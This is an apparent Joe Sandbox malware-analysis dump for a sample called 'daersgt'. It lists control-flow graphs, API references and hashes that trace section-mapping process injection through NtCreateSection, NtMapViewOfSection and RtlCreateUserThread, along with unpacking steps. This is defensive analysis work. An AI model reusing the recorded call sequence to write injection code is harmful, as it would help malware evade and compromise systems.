Module32First 7369->7370 7369->7374 7371 561d0f 7370->7371 7373 561538 7370->7373 7375 56197f 7371->7375 7374->7369 7374->7370 7376 5619aa 7375->7376 7377 5619bb VirtualAlloc 7376->7377 7378 5619f3 7376->7378 7377->7378 7501 40f1bd 7504 40f031 7501->7504 7505 40f045 7504->7505 7510 410b52 7505->7510 7507 410b52 __forcdecpt_l LCMapStringW 7509 40f06e 7507->7509 7508 40f051 __forcdecpt_l 7508->7507 7511 410b70 7510->7511 7512 410b60 7510->7512 7514 410a3d 7511->7514 7512->7508 7515 410a52 __isleadbyte_l 7514->7515 7516 410a5e __isctype_l 7515->7516 7517 40ff63 ___crtLCMapStringA LCMapStringW 7515->7517 7516->7512 7517->7516

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 101 401442 98->101 102 4014b7-4014d5 98->102 100 4014a0-4014b2 99->100 104 401492-401494 101->104 105 401444-401446 101->105 106 4014c6-4014e9 102->106 105->100 107 401448-401461 105->107 113 4014e0 106->113 111 401463-401468 107->111 112 4014c4 107->112 114 4014e5-4014f8 111->114 115 40146a 111->115 112->106 113->114 122 4014f1-4014f4 114->122 123 4014fb-40150e call 40113b 114->123 117 40146c-401476 115->117 118 4014de 115->118 120 401414-401422 117->120 121 401478-40147c 117->121 118->113 120->98 120->99 122->123 126 401510 123->126 127 401513-401518 123->127 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 135 40184a 129->135 133 401535-40155e 130->133 134 40183b 130->134 133->134 144 401564-40157b NtDuplicateObject 133->144 134->135 136 401861 135->136 137 401852-40185d 135->137 136->137 138 401864-40188e call 40113b 136->138 137->138 144->134 146 401581-4015a5 NtCreateSection 144->146 148 401601-401627 NtCreateSection 146->148 149 4015a7-4015c8 NtMapViewOfSection 146->149 148->134 150 40162d-401631 148->150 149->148 152 4015ca-4015e6 NtMapViewOfSection 149->152 150->134 153 401637-401658 NtMapViewOfSection 150->153 152->148 155 4015e8-4015fe 152->155 153->134 156 40165e-40167a NtMapViewOfSection 153->156 155->148 156->134 158 401680 call 401685 156->158
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                          • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                                          • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                          • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 161 4014b5-4014f8 170 4014f1-4014f4 161->170 171 4014fb-40150e call 40113b 161->171 170->171 174 401510 171->174 175 401513-401518 171->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 183 40184a 177->183 181 401535-40155e 178->181 182 40183b 178->182 181->182 192 401564-40157b NtDuplicateObject 181->192 182->183 184 401861 183->184 185 401852-40185d 183->185 184->185 186 401864-40188e call 40113b 184->186 185->186 192->182 194 401581-4015a5 NtCreateSection 192->194 196 401601-401627 NtCreateSection 194->196 197 4015a7-4015c8 NtMapViewOfSection 194->197 196->182 198 40162d-401631 196->198 197->196 200 4015ca-4015e6 NtMapViewOfSection 197->200 198->182 201 401637-401658 NtMapViewOfSection 198->201 200->196 203 4015e8-4015fe 200->203 201->182 204 40165e-40167a NtMapViewOfSection 201->204 203->196 204->182 206 401680 call 401685 204->206
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                          • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                                          • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                          • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed-4014f4 209->212 213 4014fb-40150e call 40113b 211->213 223 4014f1-4014f4 211->223 212->213 219 401510 213->219 220 401513-401518 213->220 219->220 225 40183d-401845 220->225 226 40151e-40152f 220->226 223->213 225->220 231 40184a 225->231 229 401535-40155e 226->229 230 40183b 226->230 229->230 240 401564-40157b NtDuplicateObject 229->240 230->231 232 401861 231->232 233 401852-40185d 231->233 232->233 234 401864-40188e call 40113b 232->234 233->234 240->230 242 401581-4015a5 NtCreateSection 240->242 244 401601-401627 NtCreateSection 242->244 245 4015a7-4015c8 NtMapViewOfSection 242->245 244->230 246 40162d-401631 244->246 245->244 248 4015ca-4015e6 NtMapViewOfSection 245->248 246->230 249 401637-401658 NtMapViewOfSection 246->249 248->244 251 4015e8-4015fe 248->251 249->230 252 40165e-40167a NtMapViewOfSection 249->252 251->244 252->230 254 401680 call 401685 252->254
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateDuplicateObjectView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1652636561-0
                                                                                                                          • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                          • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                                          • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                          • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 270 40184a 264->270 268 401535-40155e 265->268 269 40183b 265->269 268->269 279 401564-40157b NtDuplicateObject 268->279 269->270 271 401861 270->271 272 401852-40185d 270->272 271->272 273 401864-40188e call 40113b 271->273 272->273 279->269 281 401581-4015a5 NtCreateSection 279->281 283 401601-401627 NtCreateSection 281->283 284 4015a7-4015c8 NtMapViewOfSection 281->284 283->269 285 40162d-401631 283->285 284->283 287 4015ca-4015e6 NtMapViewOfSection 284->287 285->269 288 401637-401658 NtMapViewOfSection 285->288 287->283 290 4015e8-4015fe 287->290 288->269 291 40165e-40167a NtMapViewOfSection 288->291 290->283 291->269 293 401680 call 401685 291->293
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                          • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                                          • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                          • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                          • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                                          • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                          • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 5c003c-5c0047 1 5c004c-5c0263 call 5c0a3f call 5c0e0f call 5c0d90 VirtualAlloc 0->1 2 5c0049 0->2 17 5c028b-5c0292 1->17 18 5c0265-5c0289 call 5c0a69 1->18 2->1 19 5c02a1-5c02b0 17->19 21 5c02ce-5c03c2 VirtualProtect call 5c0cce call 5c0ce7 18->21 19->21 22 5c02b2-5c02cc 19->22 29 5c03d1-5c03e0 21->29 22->19 30 5c0439-5c04b8 VirtualFree 29->30 31 5c03e2-5c0437 call 5c0ce7 29->31 33 5c04be-5c04cd 30->33 34 5c05f4-5c05fe 30->34 31->29 35 5c04d3-5c04dd 33->35 36 5c077f-5c0789 34->36 37 5c0604-5c060d 34->37 35->34 39 5c04e3-5c0505 35->39 40 5c078b-5c07a3 36->40 41 5c07a6-5c07b0 36->41 37->36 42 5c0613-5c0637 37->42 51 5c0517-5c0520 39->51 52 5c0507-5c0515 39->52 40->41 44 5c086e-5c08be LoadLibraryA 41->44 45 5c07b6-5c07cb 41->45 46 5c063e-5c0648 42->46 50 5c08c7-5c08f9 44->50 48 5c07d2-5c07d5 45->48 46->36 49 5c064e-5c065a 46->49 53 5c0824-5c0833 48->53 54 5c07d7-5c07e0 48->54 49->36 55 5c0660-5c066a 49->55 56 5c08fb-5c0901 50->56 57 5c0902-5c091d 50->57 58 5c0526-5c0547 51->58 52->58 62 5c0839-5c083c 53->62 59 5c07e4-5c0822 54->59 60 5c07e2 54->60 61 5c067a-5c0689 55->61 56->57 63 5c054d-5c0550 58->63 59->48 60->53 64 5c068f-5c06b2 61->64 65 5c0750-5c077a 61->65 62->44 66 5c083e-5c0847 62->66 68 5c0556-5c056b 63->68 69 5c05e0-5c05ef 63->69 70 5c06ef-5c06fc 64->70 71 5c06b4-5c06ed 64->71 65->46 72 5c0849 66->72 73 5c084b-5c086c 66->73 74 5c056d 68->74 75 5c056f-5c057a 68->75 69->35 76 5c06fe-5c0748 70->76 77 5c074b 70->77 71->70 72->44 73->62 74->69 79 5c057c-5c0599 75->79 80 5c059b-5c05bb 75->80 76->77 77->61 84 5c05bd-5c05db 79->84 80->84 84->63
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005C024D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730604658.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_5c0000_daersgt.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction ID: 6ecb9a989f5fd5804ff419ab53124b423b4e5802c40885b424a45b5415c66c11
                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction Fuzzy Hash: D2526974A01229DFDB64CF98C985BA8BBB1BF09304F1480D9E54DAB391DB30AE95DF14

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 313 561cc0-561cd9 314 561cdb-561cdd 313->314 315 561ce4-561cf0 CreateToolhelp32Snapshot 314->315 316 561cdf 314->316 317 561cf2-561cf8 315->317 318 561d00-561d0d Module32First 315->318 316->315 317->318 325 561cfa-561cfe 317->325 319 561d16-561d1e 318->319 320 561d0f-561d10 call 56197f 318->320 323 561d15 320->323 323->319 325->314 325->318
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00561CE8
                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00561D08
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730528749.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_550000_daersgt.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3833638111-0
                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction ID: 5d7ebde238f614f18801cb665aac35e686e94e103497a588037fc06cbaeeafba
                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction Fuzzy Hash: EDF0C231500B116BE7202FF5988DB7E7AF8BF493A5F140128E642D20C0CA70EC058668

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 326 5c0e0f-5c0e24 SetErrorMode * 2 327 5c0e2b-5c0e2c 326->327 328 5c0e26 326->328 328->327
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,005C0223,?,?), ref: 005C0E19
                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,005C0223,?,?), ref: 005C0E1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730604658.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_5c0000_daersgt.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction ID: 62d43324511f6a0460b43ce37119c2a39e606a598f81983a70edaf776378af12
                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction Fuzzy Hash: 17D01231145128B7D7003AD4DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 329 40bc65-40bc6f call 40baca 331 40bc74-40bc81 329->331
                                                                                                                          APIs
                                                                                                                          • __setmbcp.LIBCMT ref: 0040BC6F
                                                                                                                            • Part of subcall function 0040BACA: getSystemCP.LIBCMT ref: 0040BAEF
                                                                                                                            • Part of subcall function 0040BACA: __malloc_crt.LIBCMT ref: 0040BB05
                                                                                                                            • Part of subcall function 0040BACA: __setmbcp_nolock.LIBCMT ref: 0040BB28
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730361832.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_40b000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System__malloc_crt__setmbcp__setmbcp_nolock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1786829287-0
                                                                                                                          • Opcode ID: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                          • Instruction ID: ab897626d73dbb0745f55126157d0f546fefb95dfe1eb26feed99d3202435efc
                                                                                                                          • Opcode Fuzzy Hash: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                          • Instruction Fuzzy Hash: 53C02B510080800CD7008B207C0570F3550EF41330F24022EF010C04C6DB695440314C

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                          • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                                          • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                          • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                          • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                                          • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                          • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                          • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                                          • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                          • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                          • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                                          • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                          • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005619D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730528749.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_550000_daersgt.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction ID: e2f2e8a4ac6818eea61ffb8a6daf6598d648672f625d63c5827f3a0e3faea5e3
                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction Fuzzy Hash: 10113C79A40208EFDB01DF98C985E98BFF5AF08351F198094F9889B362D371EA50DF94
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730335412.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_daersgt.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                          • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                                          • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                          • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.1730361832.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
